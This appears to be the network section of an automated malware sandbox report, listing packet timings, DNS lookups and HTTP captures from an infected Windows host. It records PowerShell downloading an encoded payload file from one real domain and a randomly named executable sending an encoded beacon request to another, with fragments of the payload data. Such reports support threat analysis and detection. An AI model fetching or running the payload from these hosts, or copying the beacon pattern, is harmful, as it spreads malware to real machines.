                                                                      Oct 22, 2024 15:31:24.288182020 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:24.288206100 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:24.288218975 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:24.288218975 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:24.288227081 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:24.288378954 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:24.288378954 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:24.289757013 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:24.289774895 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:24.289830923 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:24.289836884 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:24.289938927 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:24.289938927 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:24.291122913 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:24.291146994 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:24.291251898 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:24.291269064 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:24.291332960 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:24.292282104 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:24.292289972 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:24.292406082 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:24.292416096 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:24.292427063 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:24.292469025 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:24.292474985 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:24.292488098 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:24.292563915 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:24.292563915 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:24.295893908 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:14.542098999 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:14.542129040 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:14.542196035 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:14.596060038 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:14.596081972 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:15.374336958 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:15.374409914 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:15.453305960 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:15.453340054 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:15.453697920 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:15.453759909 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:15.457273960 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:15.499344110 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:15.637907028 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:15.637983084 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:15.637990952 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:15.638037920 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:15.755270958 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:15.755285978 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:15.755330086 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:15.755359888 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:15.755376101 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:15.755465031 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:15.872553110 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:15.872579098 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:15.872632980 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:15.872647047 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:15.872664928 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:15.872689009 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:15.989736080 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:15.989765882 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:15.989833117 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:15.989845991 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:15.991421938 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:16.107038975 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:16.107059956 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:16.107144117 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:16.107152939 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:16.107187986 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:16.223885059 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:16.223912001 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:16.223980904 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:16.223994017 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:16.224059105 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:16.341291904 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:16.341320992 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:16.341391087 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:16.341399908 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:16.341445923 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:16.458374023 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:16.458390951 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:16.458453894 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:16.458460093 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:16.458512068 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:16.501586914 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:16.501616001 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:16.501677990 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:16.501692057 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:16.501718998 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:16.501740932 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:16.618659019 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:16.618680954 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:16.618742943 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:16.618757010 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:16.618788004 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:16.618798971 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:16.693434954 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:16.693470001 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:16.693613052 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:16.693623066 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:16.693737030 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:16.810198069 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:16.810226917 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:16.810292959 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:16.810308933 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:16.810342073 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:16.810357094 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:16.895541906 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:16.895562887 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:16.895720005 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:16.895730972 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:16.897047043 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:16.970129967 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:16.970154047 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:16.970252037 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:16.970262051 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:16.970300913 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:17.057518005 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:17.057540894 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:17.057760954 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:17.057773113 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:17.057874918 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:17.161364079 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:17.161390066 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:17.161559105 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:17.161571026 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:17.161696911 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:17.204344034 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:17.204368114 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:17.204447985 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:17.204456091 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:17.204518080 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:17.292295933 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:17.292341948 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:17.292460918 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:17.292469978 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:17.292633057 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:17.364007950 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:17.364027977 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:17.364099026 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:17.364105940 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:17.364140034 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:17.438437939 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:17.438453913 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:17.438520908 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:17.438527107 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:17.438560963 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:17.512746096 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:17.512775898 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:17.512907028 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:17.512919903 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:17.514182091 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:17.526659012 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:17.526735067 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:17.526751041 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:17.526793957 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:17.526854038 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:17.526865959 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:33:07.659739971 CEST5000380192.168.2.5199.59.243.227
                                                                      Oct 22, 2024 15:33:07.665122986 CEST8050003199.59.243.227192.168.2.5
                                                                      Oct 22, 2024 15:33:07.665205002 CEST5000380192.168.2.5199.59.243.227
                                                                      Oct 22, 2024 15:33:07.672292948 CEST5000380192.168.2.5199.59.243.227
                                                                      Oct 22, 2024 15:33:07.677692890 CEST8050003199.59.243.227192.168.2.5
                                                                      Oct 22, 2024 15:33:08.302416086 CEST8050003199.59.243.227192.168.2.5
                                                                      Oct 22, 2024 15:33:08.302476883 CEST8050003199.59.243.227192.168.2.5
                                                                      Oct 22, 2024 15:33:08.302661896 CEST5000380192.168.2.5199.59.243.227
                                                                      Oct 22, 2024 15:33:08.302994967 CEST8050003199.59.243.227192.168.2.5
                                                                      Oct 22, 2024 15:33:08.303055048 CEST5000380192.168.2.5199.59.243.227
                                                                      Oct 22, 2024 15:33:08.306149006 CEST5000380192.168.2.5199.59.243.227
                                                                      Oct 22, 2024 15:33:08.311580896 CEST8050003199.59.243.227192.168.2.5

                                                                      UDP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Oct 22, 2024 15:31:17.011495113 CEST6541953192.168.2.51.1.1.1
                                                                      Oct 22, 2024 15:31:17.027180910 CEST53654191.1.1.1192.168.2.5
                                                                      Oct 22, 2024 15:31:20.474730968 CEST6189053192.168.2.51.1.1.1
                                                                      Oct 22, 2024 15:31:20.549321890 CEST53618901.1.1.1192.168.2.5
                                                                      Oct 22, 2024 15:33:07.529012918 CEST5908753192.168.2.51.1.1.1
                                                                      Oct 22, 2024 15:33:07.653238058 CEST53590871.1.1.1192.168.2.5

                                                                      DNS Queries

                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                      Oct 22, 2024 15:31:17.011495113 CEST192.168.2.51.1.1.10xf168Standard query (0)gormezl_6777.6777.6777.677eA (IP address)IN (0x0001)false
                                                                      Oct 22, 2024 15:31:20.474730968 CEST192.168.2.51.1.1.10x18bdStandard query (0)www.groupriam.comA (IP address)IN (0x0001)false
                                                                      Oct 22, 2024 15:33:07.529012918 CEST192.168.2.51.1.1.10xca58Standard query (0)www.foundation-repair.bizA (IP address)IN (0x0001)false

                                                                      DNS Answers

                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                      Oct 22, 2024 15:31:17.027180910 CEST1.1.1.1192.168.2.50xf168Name error (3)gormezl_6777.6777.6777.677enonenoneA (IP address)IN (0x0001)false
                                                                      Oct 22, 2024 15:31:20.549321890 CEST1.1.1.1192.168.2.50x18bdNo error (0)www.groupriam.comgroupriam.comCNAME (Canonical name)IN (0x0001)false
                                                                      Oct 22, 2024 15:31:20.549321890 CEST1.1.1.1192.168.2.50x18bdNo error (0)groupriam.com199.103.62.205A (IP address)IN (0x0001)false
                                                                      Oct 22, 2024 15:33:07.653238058 CEST1.1.1.1192.168.2.50xca58No error (0)www.foundation-repair.biz199.59.243.227A (IP address)IN (0x0001)false

                                                                      HTTP Request Dependency Graph

                                                                      • www.groupriam.com
                                                                      • www.foundation-repair.biz

                                                                      HTTP Packets

                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      0192.168.2.550003199.59.243.227802576C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Oct 22, 2024 15:33:07.672292948 CEST563OUTGET /enra/?mxv=bBN4&XFtPf6=EuJScojaXV9tkcwLe9A6ZNdie4KkCxAOd2jPPlI8uN15nuMsourZ6RcE0C5sWIKd2oJ0ti0mlaCO+WC8VNvzR3lGN8BbnO4B13xmkasr+DtvmANIh/JvA8i/3xstHKmsaw== HTTP/1.1
                                                                      Host: www.foundation-repair.biz
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-us
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                                      Oct 22, 2024 15:33:08.302416086 CEST1236INHTTP/1.1 200 OK
                                                                      date: Tue, 22 Oct 2024 13:33:07 GMT
                                                                      content-type: text/html; charset=utf-8
                                                                      content-length: 1506
                                                                      x-request-id: 44f578de-996e-443a-9cbd-108e82ba86f8
                                                                      cache-control: no-store, max-age=0
                                                                      accept-ch: sec-ch-prefers-color-scheme
                                                                      critical-ch: sec-ch-prefers-color-scheme
                                                                      vary: sec-ch-prefers-color-scheme
                                                                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_yV7ZIeh2FNb0qJFoZYuuW50+lBDt4N9KPKkfB7p7cP8+jIYbunUuB6qp8AXW4dq5bmQ44kmZexgkr0mpCrS0JQ==
                                                                      set-cookie: parking_session=44f578de-996e-443a-9cbd-108e82ba86f8; expires=Tue, 22 Oct 2024 13:48:08 GMT; path=/
                                                                      connection: close
                                                                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 79 56 37 5a 49 65 68 32 46 4e 62 30 71 4a 46 6f 5a 59 75 75 57 35 30 2b 6c 42 44 74 34 4e 39 4b 50 4b 6b 66 42 37 70 37 63 50 38 2b 6a 49 59 62 75 6e 55 75 42 36 71 70 38 41 58 57 34 64 71 35 62 6d 51 34 34 6b 6d 5a 65 78 67 6b 72 30 6d 70 43 72 53 30 4a 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                      Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_yV7ZIeh2FNb0qJFoZYuuW50+lBDt4N9KPKkfB7p7cP8+jIYbunUuB6qp8AXW4dq5bmQ44kmZexgkr0mpCrS0JQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                      Oct 22, 2024 15:33:08.302476883 CEST959INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                      Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNDRmNTc4ZGUtOTk2ZS00NDNhLTljYmQtMTA4ZTgyYmE4NmY4IiwicGFnZV90aW1lIjoxNzI5NjAzOT


                                                                      HTTPS Proxied Packets

                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      0192.168.2.549718199.103.62.2054437156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-10-22 13:31:21 UTC176OUTGET /Koalitioner.prx HTTP/1.1
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                      Host: www.groupriam.com
                                                                      Connection: Keep-Alive
                                                                      2024-10-22 13:31:21 UTC422INHTTP/1.1 200 OK
                                                                      Connection: close
                                                                      content-type: application/octet-stream
                                                                      last-modified: Mon, 21 Oct 2024 13:43:55 GMT
                                                                      accept-ranges: bytes
                                                                      content-length: 494360
                                                                      date: Tue, 22 Oct 2024 13:31:21 GMT
                                                                      server: LiteSpeed
                                                                      vary: User-Agent
                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                      2024-10-22 13:31:21 UTC16384INData Raw: 63 51 47 62 63 51 47 62 75 37 75 4c 44 41 42 78 41 5a 76 72 41 70 4b 52 41 31 77 6b 42 4f 73 43 78 6c 46 78 41 5a 75 35 33 4c 68 73 4b 4f 73 43 6a 65 70 78 41 5a 75 42 38 5a 2b 77 75 72 44 72 41 75 79 30 36 77 4a 6a 79 59 48 70 51 77 6a 57 6d 48 45 42 6d 33 45 42 6d 2b 73 43 37 36 48 72 41 68 52 74 75 68 30 54 4d 4f 72 72 41 70 4b 59 36 77 4b 43 6b 65 73 43 70 52 5a 78 41 5a 73 78 79 75 73 43 6e 58 54 72 41 70 78 64 69 52 51 4c 36 77 4b 41 46 58 45 42 6d 39 48 69 36 77 4c 49 2f 48 45 42 6d 34 50 42 42 4f 73 43 37 2b 31 78 41 5a 75 42 2b 51 58 6e 54 51 4a 38 79 75 73 43 48 66 6e 72 41 68 32 76 69 30 51 6b 42 4f 73 43 55 41 72 72 41 69 79 6a 69 63 4e 78 41 5a 74 78 41 5a 75 42 77 35 76 30 74 77 48 72 41 6e 6c 56 63 51 47 62 75 72 72 79 2b 43 2f 72 41 70 69
                                                                      Data Ascii: cQGbcQGbu7uLDABxAZvrApKRA1wkBOsCxlFxAZu53LhsKOsCjepxAZuB8Z+wurDrAuy06wJjyYHpQwjWmHEBm3EBm+sC76HrAhRtuh0TMOrrApKY6wKCkesCpRZxAZsxyusCnXTrApxdiRQL6wKAFXEBm9Hi6wLI/HEBm4PBBOsC7+1xAZuB+QXnTQJ8yusCHfnrAh2vi0QkBOsCUArrAiyjicNxAZtxAZuBw5v0twHrAnlVcQGburry+C/rApi
                                                                      2024-10-22 13:31:22 UTC16384INData Raw: 57 6b 62 53 6b 2b 65 76 6b 6e 39 42 56 63 47 6d 4c 39 39 4f 7a 35 39 6a 4a 68 6a 43 44 6b 78 67 44 2b 47 74 34 4d 78 4c 57 71 30 76 6f 38 4b 6a 45 32 48 4e 5a 43 75 6a 7a 57 51 72 6f 38 31 6b 4b 36 50 4e 5a 43 75 6a 7a 57 51 72 6f 7a 4a 78 4b 68 4e 6f 78 78 54 38 36 74 51 55 78 34 56 4e 76 74 41 78 63 38 72 56 79 72 4b 65 53 69 6f 53 51 66 37 50 4b 35 66 30 63 69 78 67 44 37 48 6c 33 50 5a 32 49 39 73 69 4f 6f 64 5a 53 45 48 74 48 46 39 52 72 4d 78 45 41 75 38 65 37 54 72 6f 6d 61 46 4d 43 58 46 66 4f 68 33 30 41 70 6d 4e 6a 50 4e 4f 43 6d 39 76 6f 34 70 30 4b 45 44 67 4b 36 50 4e 4e 70 46 35 46 63 4a 66 49 6a 2f 7a 47 39 37 46 35 64 6d 6d 75 4c 39 58 4b 73 65 49 35 64 31 2f 34 43 49 59 65 47 6e 37 64 51 6e 68 30 47 51 68 64 56 32 68 77 4e 33 38 52 42 6d
                                                                      Data Ascii: WkbSk+evkn9BVcGmL99Oz59jJhjCDkxgD+Gt4MxLWq0vo8KjE2HNZCujzWQro81kK6PNZCujzWQrozJxKhNoxxT86tQUx4VNvtAxc8rVyrKeSioSQf7PK5f0cixgD7Hl3PZ2I9siOodZSEHtHF9RrMxEAu8e7TromaFMCXFfOh30ApmNjPNOCm9vo4p0KEDgK6PNNpF5FcJfIj/zG97F5dmmuL9XKseI5d1/4CIYeGn7dQnh0GQhdV2hwN38RBm
                                                                      2024-10-22 13:31:22 UTC16384INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
